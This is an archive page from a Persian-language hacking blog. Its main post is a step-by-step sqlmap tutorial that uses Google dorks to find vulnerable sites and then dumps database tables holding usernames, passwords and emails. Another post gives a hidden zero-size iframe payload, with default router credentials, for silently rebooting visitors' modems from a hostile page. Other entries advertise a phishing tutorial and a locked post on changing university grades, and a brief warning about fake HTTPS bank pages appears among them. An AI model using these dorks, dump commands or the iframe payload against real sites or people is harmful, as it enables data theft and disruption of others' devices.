بایگانی آذر ۱۳۹۶ :: Cyber Security

:: آموزش امنیت سایبری و پیشگیری از جرایم سایبری ::

هک یک هنر است برای سازندگی نه برای تخریب!

آموزش دامپ دیتابیس سایت ها

آموزش دامپ دیتابیس سایت ها با باگ Sql Injection با کمک ابذار Sqlmap


در قدم اول یک سایت که دارایی باگ sql داره را پیدا کنید(میتوانید از دورک های زیر استفاده کنید)

inurl:news.php?id=
inurl:pages.php?id=
inurl:post.php?id=
inurl:events.php?id=
inurl:details.php?id=
inurl:blog.php?id=
inurl:show.php?id=

تارگتی که بنده در این آموزش استفاده میکنم 
http://testphp.vulnweb.com/listproducts.php?cat=1'

 (سپس یک ترمینال را بازکنید(با دستور زیر دیتابیس سایت را بیرون بکشید

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 —dbs

 سپس دیتابیس های سایت رو به ما در اخر نشون میده بعدش با دستور زیر جدول های دیتادیس مورد نظر خودمونو بدست میاریم

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D نام دیتابیس —tables

مثلا ما فرض رو به این میگیریم یه تیبل به ما نشون میده و اسمش هم یوزر هستش با دستور زیر ستون های دیتابیس رو بدست میاریم

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D dbname -T users —columns

فرض میکنیم که سه تا ستون زیر رو نشون میده

username
password
email

در نهایت با دستور زیر دیتای ستون هارو بدست میاریم
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D dbname -T users -C username password email —dump

دیتابیس شما با موفقیت دامپ شد


ومن الله توفیق


منبع: Hijack.blog.ir

۰ نظر

آموزش حملات فیشینگ با ابزار SeToolkit

phishing-kali

جهت دریافت آموزش کلیک کنید
حجم: 17.6 مگابایت

رمز فایل: hijack.blog.ir

۰ نظر

آموزش نفوذ به سیستم دانشگاهی و تغییر نمرات

برای نمایش مطلب باید رمز عبور را وارد کنید

صفحه جعلی همراه با پروتکل SSL


💢امنیت در فضای مجازی را جدی بگیرید

💥هرگز وجود https دلیل بر اصل بودن یک پیج بانکی‌نیست


⚠️1. تمامی بانک های مجاز به سامانه شاپرک متصل میشن 
⚠️2. سایت پذیره رو اشتباه وارد کرده 
⚠️3. اطلاعات پرداختو با متود get دریافت کرده 
⚠️4.دارایی فیلتر می باشد

منبع: Hijack.blog.ir

۰ نظر

آموزش ریست کردن مودم قربانی

درود خدمت شما دوستان

------------------------

برای ریست کردن مودم دیگران با یک کلیک این اسکریپت رو داخل فایلی با پسوند php بریزید و روی هاست آپلود کنید و یا درون قالب وبلاگ بزارید و با یک کلیک مودم رو ریست کنید


iframe src="http://admin:admin@192.168.1.1/rebootinfo.cgi" width=0 height=0>
یوزر و پسورد و آی پی مودم رو باید به صورت زیر تنظیم کنید
iframe src="http://user:password@ip/rebootinfo.cgi" width=0 height=0>
⚠️  استفاده نادرست بر عهده خود شخص است و نویسنده وبلاگ هیچ گونه مسولیتی ندارد ⚠️

منبع: Hijack.blog.ir
۰ نظر

ابزار Google hacking

google hacking

ابزار گوگل هکینگ جهت سرچ پیشرفته در گوگل

جهت دریافت ابزار کلیک کنید
حجم: 805 kb

رمز فایل: hijack.blog.ir

۰ نظر